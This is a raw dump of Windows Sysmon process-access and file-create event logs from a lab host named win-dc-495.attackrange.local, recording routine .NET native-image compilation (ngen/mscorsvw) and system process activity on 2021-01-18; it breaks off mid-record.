13:47:42.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006840Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.671{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006839Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.671{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006838Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.624{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006837Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.608{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006836Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:42.608{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917E-6005-A702-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006835Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:42.530{59A5CD1D-917D-6005-A602-00000000A301}728C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\2d8-0\System.ServiceModel.Discovery.dll2021-01-18 13:47:42.530 10341000x80000000000000006859Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.921{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006858Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.921{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006857Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.921{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AD02-00000000A301}2484C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006856Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.858{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f3c-0\System.ServiceModel.ServiceMoniker40.dll2021-01-18 13:47:43.858 10341000x80000000000000006855Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.827{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006854Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.811{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006853Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.811{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AC02-00000000A301}3900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006852Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.780{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006851Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.765{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006850Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AB02-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006849Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.702{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1308-0\System.ServiceModel.Routing.dll2021-01-18 13:47:43.702 10341000x80000000000000006848Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.327{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006847Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.311{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006846Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.311{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-AA02-00000000A301}4872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006845Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.265{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006844Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.249{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006843Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:43.249{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-917F-6005-A902-00000000A301}2956C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006842Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:43.171{59A5CD1D-917E-6005-A802-00000000A301}4544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\11c0-0\System.ServiceModel.Internals.dll2021-01-18 13:47:43.171 10341000x80000000000000006875Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006874Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006873Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006872Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 